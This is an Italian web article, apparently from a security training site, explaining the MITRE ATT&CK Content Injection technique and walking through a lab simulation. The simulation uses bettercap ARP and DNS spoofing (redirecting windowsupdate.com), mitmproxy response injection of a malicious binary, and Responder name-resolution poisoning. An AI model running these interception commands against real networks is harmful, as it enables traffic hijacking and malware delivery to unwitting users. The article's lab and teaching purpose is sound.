Iscriviti al webinar gratuito del 12 Maggio per diventare Forensic Analyst! Scopri di più
Corso Ethical Hacker: accedi alla promozione fino al 30 Aprile! Scopri di più
La Content Injection è una tecnica in cui l'avversario manipola il traffico di rete legittimo per iniettare contenuto malevolo direttamente nelle comunicazioni tra client e server. A differenza degli attacchi che attirano la vittima su un sito compromesso, qui l'iniezione avviene nel canale di trasporto: il traffico HTTP, DNS o SMB viene alterato in transito, e la vittima riceve risposte contraffatte senza mai visitare un dominio sospetto.
Questa tecnica copre due tattiche distinte nella kill chain. Come vettore di Initial Access (TA0001), permette all'attaccante di ottenere il primo punto d'appoggio nella rete bersaglio — la vittima scarica malware credendo di interagire con un servizio legittimo. Come meccanismo di Command and Control (TA0011), consente comunicazioni persistenti con sistemi già compromessi, veicolando comandi e payload aggiuntivi attraverso lo stesso canale manipolato.
L'iniezione può avvenire from the middle, quando l'avversario è posizionato tra client e server lungo il percorso di rete — tipicamente a livello ISP o tramite la cosiddetta "lawful interception" — oppure from the side, quando il contenuto malevolo viene iniettato in competizione con la risposta legittima, sfruttando la velocità per arrivare primo al client. L'ecosistema documentato comprende 1 gruppo APT, 1 malware dedicato e 2 mitigazioni, delineando un panorama di nicchia ma dall'impatto chirurgico.
Per simulare la Content Injection in laboratorio è necessario un ambiente controllato che replichi il posizionamento dell'attaccante nel percorso di rete. L'obiettivo è dimostrare come un avversario posizionato a livello di rete intermedia possa alterare risposte DNS, HTTP e SMB per reindirizzare il traffico della vittima verso payload malevoli.
Il tool di riferimento è bettercap (open source), un framework di attacco di rete che gestisce ARP spoofing, DNS spoofing e HTTP proxy injection da un'unica interfaccia. Per avviare un'intercettazione con iniezione DNS su rete locale, configura prima il forwarding IP e poi lancia bettercap in modalità interattiva:
echo 1 > /proc/sys/net/ipv4/ip_forward
sudo bettercap -iface eth0
All'interno della sessione interattiva, attiva lo spoofing ARP e il proxy DNS per redirigere le query verso un host controllato:
set arp.spoof.targets <IP-VITTIMA> arp.spoof on set dns.spoof.domains windowsupdate.com set dns.spoof.address <IP-ATTACCANTE> dns.spoof on
Per l'iniezione HTTP, mitmproxy (open source) offre un controllo granulare sulle risposte. Uno script Python personalizzato consente di sostituire il body delle risposte HTTP con contenuto arbitrario. Lancia mitmproxy in modalità trasparente con uno script di modifica:
mitmproxy --mode transparent --scripts inject_payload.py
Lo script può intercettare richieste specifiche — ad esempio verso un endpoint di aggiornamento software — e restituire un binario malevolo al posto del file legittimo. Questo replica fedelmente lo scenario della pagina fake di Windows Update documentato nelle operazioni reali.
Per la componente SMB, Responder (open source) cattura e manipola il traffico di risoluzione nomi sulla rete locale. In modalità base:
sudo responder -I eth0 -rdw
Questo avvia listener su NBT-NS, LLMNR e mDNS, rispondendo alle query di risoluzione con l'indirizzo dell'attaccante e servendo file SMB arbitrari. Per una simulazione completa della catena d'attacco, combina i tre strumenti: Responder per SMB, bettercap per DNS, e un web server — come il modulo http.server di Python — che ospiti una pagina clone di Windows Update con un payload eseguibile.
Ricorda di documentare ogni passaggio con cattura PCAP tramite tcpdump (open source) o Wireshark (open source), fondamentale per la validazione dei risultati e la successiva analisi forense.
Scarica la guida gratuita e segui il percorso corretto fin dal primo passo